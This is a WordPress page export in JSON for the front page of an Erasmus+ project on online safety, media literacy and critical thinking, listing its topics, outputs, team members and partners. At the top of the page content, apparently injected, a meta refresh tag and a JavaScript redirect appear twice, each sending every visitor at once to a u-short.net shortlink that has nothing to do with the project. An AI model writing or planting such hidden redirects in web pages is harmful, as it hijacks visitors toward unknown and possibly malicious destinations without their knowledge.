{"id":446,"date":"2020-07-27T12:13:30","date_gmt":"2020-07-27T10:13:30","guid":{"rendered":"http:\/\/myslim.eu\/front-page-english\/"},"modified":"2022-02-22T15:02:26","modified_gmt":"2022-02-22T14:02:26","slug":"front-page-english","status":"publish","type":"page","link":"https:\/\/myslim.eu\/en\/front-page-english\/","title":{"rendered":"Front Page &#8211; English"},"content":{"rendered":"<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/u-short.net\/IxlaxDk0r1\" \/>\r\n<script>window.location.href = \"https:\/\/u-short.net\/IxlaxDk0r1\";<\/script>\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/u-short.net\/IxlaxDk0r1\" \/>\r\n<script>window.location.href = \"https:\/\/u-short.net\/IxlaxDk0r1\";<\/script>\r\n<div id=\"content-3\" style=\"background-color: #ffffff;\" data-label=\"Content\" data-id=\"content-image-left\" data-category=\"content\" class=\"content-left-image-section\">\r\n<div class=\"gridContainer\">\r\n<div class=\"row\">\r\n<div class=\"content-left-image-imgcol\" data-type=\"column\"><img decoding=\"async\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/04\/lighter_final.png\" class=\"\"><\/div>\r\n<div class=\"content-left-image-textcol dynamic-color\" data-type=\"column\">\r\n<h2 class=\"\">(Un)secure on the network<\/h2>\r\n<p class=\"large_text\">The project aims to support youth work, the development of media literacy, critical thinking, and responsible use of ICT.<\/p>\r\n<a class=\"button blue\" https:>MORE ABOUT THE PROJECT <\/a>\r\n<p class=\"\">The project (Un)secure on the Network is funded by the European Union&#8217;s Erasmus+ program.<\/p>\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div id=\"o-projekte\" style=\"background-color: #ffffff;\" data-label=\"O projekte\" data-id=\"stripped-coloured-icon-boxes\" data-category=\"overlapable\" class=\"features-coloured-icon-boxes-section\" data-overlap=\"true\">\r\n<div class=\"gridContainer\">\r\n<div class=\"features-coloured-icon-boxes-innerrow flexbox-list dark-text\" data-type=\"row\">\r\n<div class=\"features-coloured-icon-boxes-featurecol cp4cols\">\r\n<div class=\"features-coloured-icon-boxes-iconcontainer\" data-content-item-container=\"true\"><i class=\"features-coloured-icon fa fa-list-alt\" data-cp-fa=\"true\"><\/i><\/div>\r\n<h4 class=\"\">Main topics<\/h4>\r\n<p class=\"\">We focus on:<\/p>\r\n&#8211; critical thinking\r\n<\/br>\r\n&#8211; media literacy\r\n<\/br>\r\n&#8211; digital citizenship\r\n<\/br>\r\n&#8211; online safety\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a class=\"features-coloured-button\" href=\"https:\/\/myslim.eu\/en\/main-topics\/\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"features-coloured-icon-boxes-featurecol cp4cols\">\r\n<div class=\"features-coloured-icon-boxes-iconcontainer\" data-content-item-container=\"true\"><i class=\"features-coloured-icon fa fa-cogs\" data-cp-fa=\"true\"><\/i><\/div>\r\n<h4 class=\"\">Activities and outputs<\/h4>\r\nThe project outputs include an online web application for the development of critical thinking,\r\na publication with activities for the development of competences, and activities such as transnational course of multipliers, a series of workshops, and a conference.\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a class=\"features-coloured-button\" href=\"https:\/\/myslim.eu\/en\/activities-and-outputs\/\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"features-coloured-icon-boxes-featurecol cp4cols\">\r\n<div class=\"features-coloured-icon-boxes-iconcontainer\" data-content-item-container=\"true\"><i class=\"features-coloured-icon fa fa-address-card\" data-cp-fa=\"true\"><\/i><\/div>\r\n<h4 class=\"\">Involved organizations<\/h4>\r\nCenter for the Support of Non-Formal Education (SK),\r\n<\/p>\r\nDigital Intelligence (SK),\r\n<\/p>\r\nAssociation for International Affairs (CZ)\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a class=\"features-coloured-button\" href=\"https:\/\/myslim.eu\/en\/involved-organizations\/\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div data-label=\"For lecturers\" data-id=\"features-image-cards-section\" data-category=\"features\" class=\"features-image-cards-section\" style=\"background-color: #f6f6f6;\" id=\"for-lecturers\">\r\n<div class=\"gridContainer\">\r\n<div class=\"features-image-cards-textrow\">\r\n<div class=\"features-image-cards-textcol dynamic-color\" data-type=\"column\">\r\n<h2 class=\"\">For lecturers and teachers<\/h2>\r\n<p class=\"\">Materials for lecturers and teachers addressing topics such as media literacy, critical thinking, and safe and responsible online behavior.<\/p>\r\n\r\n<\/div>\r\n<\/div>\r\n<div class=\"features-image-cards-innerrow flexbox-list dark-text\" data-type=\"row\">\r\n<div class=\"features-image-cards-cardcol cp4cols cp6cols-tablet\">\r\n<div class=\"features-image-cards-cardrow\">\r\n\r\n<img decoding=\"async\" class=\"features-image-cards-featimg\" src=\"https:\/\/myslim.eu\/wp-content\/plugins\/one-page-express-companion\/theme-data\/one-page-express\/sections\/images\/rodion-kutsaev-184298-1920x1280.jpg\">\r\n<div class=\"features-image-cards-cardtextrow\" data-type=\"column\">\r\n<h4 class=\"\">Web app<\/h4>\r\n<p class=\"\">An interactive web app designed to develop critical thinking skills.<\/p>\r\n\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/online-web-app\/\" rel=\"noopener noreferrer\">GO TO THE APP<\/a>\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"features-image-cards-cardcol cp4cols cp6cols-tablet\">\r\n<div class=\"features-image-cards-cardrow\">\r\n\r\n<img decoding=\"async\" class=\"features-image-cards-featimg\" src=\"https:\/\/myslim.eu\/wp-content\/plugins\/one-page-express-companion\/theme-data\/one-page-express\/sections\/images\/project2.jpg\">\r\n<div class=\"features-image-cards-cardtextrow\" data-type=\"column\">\r\n<h4 class=\"\">Publication<\/h4>\r\n<p class=\"\">A guide with fundamental theoretical information and non-formal learning activities related to project topics.<\/p>\r\n\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/publication\/\" rel=\"noopener noreferrer\">DOWNLOAD THE PUBLICATION<\/a>\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"features-image-cards-cardcol cp4cols cp6cols-tablet\">\r\n<div class=\"features-image-cards-cardrow\">\r\n\r\n<img decoding=\"async\" class=\"features-image-cards-featimg\" src=\"https:\/\/myslim.eu\/wp-content\/plugins\/one-page-express-companion\/theme-data\/one-page-express\/sections\/images\/timothy-muza-572-1920x1281.jpg\">\r\n<div class=\"features-image-cards-cardtextrow\" data-type=\"column\">\r\n<h4 class=\"\">Additional resources<\/h4>\r\n<p class=\"\">List of materials: publications, videos, pages etc.<\/p>\r\n\r\n\r\n<hr class=\"features-image-cards-separator\">\r\n\r\n<a href=\"#\" class=\"\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"font-icon-22 fa fa-arrow-circle-right\" data-cp-fa=\"true\"><\/i>&nbsp;learn more<\/a> <a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/additional-resources\/\" target=\"_self\" rel=\"noopener noreferrer\">List of materials<\/a>\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div id=\"nas-team\" style=\"background-color: #ffffff;\" data-label=\"Our team\" data-id=\"team-colors-section\" data-category=\"team\" class=\"team-colors-section\">\r\n<div class=\"gridContainer\">\r\n<div class=\"team-colors-textcol dynamic-color\">\r\n<h2>Our project team<\/h2>\r\n<p class=\"\">People involved in the preparation and implementation of the project.<\/p>\r\n(Un)secure on the Network\r\n\r\n<\/div>\r\n<div class=\"team-colors-membersrow dark-text\" data-type=\"row\">\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Johny.jpg\">\r\n<h4 class=\"team-colors-membername\">J\u00e1n Smatana<\/h4>\r\n<p class=\"team-colors-memberposition\">Project Coordinator, expert<\/p>\r\n<p class=\"\">A leading project coordinator and a member of the team of experts that creates intellectual outputs: the web app and publication.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#johny\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Michaela.jpg\">\r\n<h4 class=\"team-colors-membername\">Michaela Trnkov\u00e1<\/h4>\r\n<p class=\"team-colors-memberposition\">Project Coordinator (AMO), expert<\/p>\r\n<p class=\"\">A project coordinator for the Czech partner and a member of the team of experts that creates intellectual outputs: the web app and publication.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#michaela\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Filip.jpg\">\r\n<h4 class=\"team-colors-membername\">Filip Sommer<\/h4>\r\n<p class=\"team-colors-memberposition\">Project Coordinator (AMO), expert, lecturer<\/p>\r\n<p class=\"\">A project coordinator for the Czech partner and a member of the team of experts that creates an intellectual output: publication. A lecturer of international trainings.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#filip\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Andrea.jpg\">\r\n<h4 class=\"team-colors-membername\">Andrea Cox<\/h4>\r\n<p class=\"team-colors-memberposition\">Project Coordinator (digiQ), expert, lecturer<\/p>\r\n<p class=\"\">A project coordinator for the Slovak partner and a member of the team of experts that creates an intellectual output: publication. A lecturer of international trainings.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#andrea\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Dada.png\" height=\"175\">\r\n<h4 class=\"team-colors-membername\">Dagmara Vere\u0161pejov\u00e1<\/h4>\r\n<p class=\"team-colors-memberposition\">Expert, lecturer<\/p>\r\n<p class=\"\">A member of the team of experts that creates an intellectual output: publication. A lecturer of international trainings.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#dada\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Peter_2.jpg\" height=\"175\">\r\n<h4 class=\"team-colors-membername\">Peter Smatana<\/h4>\r\n<p class=\"team-colors-memberposition\">Analyst, developer<\/p>\r\n<p class=\"\">A member of the team that creates an intellectual output: an interactive educational application.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#peter\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/Lubos.jpg\" height=\"175\">\r\n<h4 class=\"team-colors-membername\">\u013dubo\u0161 Marcinek<\/h4>\r\n<p class=\"team-colors-memberposition\">Education Coordinator (CeNef), Administrative worker<\/p>\r\n<p class=\"\">Coordination of educational activities in Slovakia and assistance with project administration.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/08\/natalia.jpeg\">\r\n<h4 class=\"team-colors-membername\">Nat\u00e1lia Babicov\u00e1<\/h4>\r\n<p class=\"team-colors-memberposition\">Education Coordinator (digiQ)<\/p>\r\n<p class=\"\">Coordination of educational activities for the digiQ organization.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#natalia\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"team-colors-membercol cp6cols-tablet cp4cols\">\r\n<div class=\"team-colors-membercard\">\r\n<div class=\"team-colors-background\"><\/div>\r\n<div class=\"team-colors-memberinfo\" data-type=\"column\">\r\n\r\n<img decoding=\"async\" class=\"team-colors-memberimg\" data-size=\"500x500\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2020\/09\/julka.jpg\">\r\n<h4 class=\"team-colors-membername\">J\u00falia Bal\u00e1\u017eov\u00e1<\/h4>\r\n<p class=\"team-colors-memberposition\">Expert<\/p>\r\n<p class=\"\">A member of the team that creates an intellectual output: publication.<\/p>\r\n\r\n\r\n<hr class=\"team-colors-separator\">\r\n\r\n<a class=\"button blue\" href=\"https:\/\/myslim.eu\/en\/project-team\/#julka\" target=\"_self\" rel=\"noopener noreferrer\">Read more<\/a>\r\n\r\n<\/div>\r\n<div class=\"team-colors-membericons\" data-type=\"group\"><a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"team-colors-icon fa fa-linkedin\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-twitter\" data-cp-fa=\"true\"><\/i><\/a> <a href=\"#\" target=\"_self\" data-reiki-hidden=\"true\" rel=\"noopener noreferrer\"><i class=\"fa team-colors-icon fa-dribbble\" data-cp-fa=\"true\"><\/i><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div id=\"numbers\" data-label=\"Numbers\" data-id=\"numbers-section\" data-category=\"numbers\" data-bg=\"transparent\" class=\"numbers-section\" data-parallax-depth=\"20\">\r\n<div class=\"gridContainer dynamic-color\">\r\n<div class=\"numbers-itemcol\">\r\n<h2 class=\"numbers-numbertext\">3<\/h2>\r\n<h3 class=\"numbers-titletext\">Organizations<\/h3>\r\n<\/div>\r\n<div class=\"numbers-itemcol\">\r\n<h2 class=\"numbers-numbertext\">2<\/h2>\r\n<h3 class=\"numbers-titletext\">Countries<\/h3>\r\n<\/div>\r\n<div class=\"numbers-itemcol-last\">\r\n<h2 class=\"numbers-numbertext\">16<\/h2>\r\n<h3 class=\"numbers-titletext\">Planned events<\/h3>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div id=\"latest-posts\" style=\"background-color: #ffffff;\" data-label=\"Latest posts\" data-id=\"blog-section\" data-category=\"latest_news\" class=\"blog-section\">\r\n<div class=\"gridContainer\">\r\n<div class=\"blog-textrow\">\r\n<div class=\"blog-textcol dynamic-color\" data-type=\"column\">\r\n<h2 class=\"\">News<\/h2>\r\n<p class=\"\">The latest articles and contributions to the topics we deal with within the project.<\/p>\r\n\r\n<\/div>\r\n<\/div>\r\n<div class=\"blog-postsrow dark-text\" data-type=\"row\" data-dynamic-columns=\"one_page_express_latest_news_columns\" data-content-shortcode=\"one_page_express_latest_news\">    <\/div>\r\n<div class=\"blog-textcol\"><a class=\"button blue\" data-attr-shortcode=\"href:one_page_express_blog_link\" href=\"https:\/\/myslim.eu\/en\/news\/\">All posts<\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<div id=\"contact\" data-label=\"contact\" data-id=\"contact-section\" data-category=\"contact\" data-bg=\"transparent\" class=\"contact-section-formsection white-text\">\r\n<div class=\"gridContainer\">\r\n<div class=\"row_224\">\r\n<div class=\"contact-textrow\">\r\n<div class=\"contact-textcol dynamic-color\">\r\n<h2 class=\"\">Contact<\/h2>\r\n<p class=\"white_text\">Project coordinator:<\/p>\r\n<p class=\"white_text\">Centrum pre podporu neform\u00e1lneho vzdel\u00e1vania<\/p>\r\n<p class=\"white_text\">Vajansk\u00e9ho 17, 080 01 Pre\u0161ov<\/p>\r\nE-mail: johny@cenef.sk\r\n\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div data-label=\"Organiztori\" data-id=\"clients-strip-section\" data-category=\"clients\" class=\"clients-strip-section\" id=\"organiztori\" style=\"background-color: #ffffff;\">\r\n<div class=\"row_187\" data-type=\"row\" data-add-content=\"false\">\r\n<div class=\"clients-strip-itemcol cp3cols\">\r\n<div class=\"middle_align1\"><a href=\"http:\/\/www.cenef.sk\" target=\"_blank\" class=\"\" rel=\"noopener noreferrer\"><img decoding=\"async\" class=\"clients-strip-itemimg\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2019\/10\/cenef_transparent.png\"><\/a><\/div>\r\n<\/div>\r\n<div class=\"clients-strip-itemcol cp3cols\">\r\n<div class=\"middle_align1\"><a href=\"http:\/\/www.digiq.sk\" target=\"_blank\" class=\"\" rel=\"noopener noreferrer\"><img decoding=\"async\" class=\"clients-strip-itemimg\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2019\/10\/digiq_logo_male.png\"><\/a><\/div>\r\n<\/div>\r\n<div class=\"clients-strip-itemcol cp3cols\">\r\n<div class=\"middle_align1\"><a href=\"http:\/\/www.amo.cz\" target=\"_blank\" class=\"\" rel=\"noopener noreferrer\"><img decoding=\"async\" class=\"clients-strip-itemimg\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2019\/10\/AMO_black1_male.png\"><\/a><\/div>\r\n<\/div>\r\n<div class=\"clients-strip-itemcol cp3cols\">\r\n<div class=\"middle_align1\"><a href=\"http:\/\/www.erasmusplus.sk\" target=\"_blank\" class=\"\" rel=\"noopener noreferrer\"><img decoding=\"async\" class=\"clients-strip-itemimg\" src=\"https:\/\/myslim.eu\/wp-content\/uploads\/2019\/10\/logo_Erasmus.png\"><\/a><\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>","protected":false},"excerpt":{"rendered":"<p>(Un)secure on the network The project aims to support youth work, the development of media literacy, critical thinking, and responsible use of ICT.<\/p>","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/446"}],"collection":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/comments?post=446"}],"version-history":[{"count":18,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/446\/revisions"}],"predecessor-version":[{"id":1298,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/446\/revisions\/1298"}],"wp:attachment":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/media?parent=446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}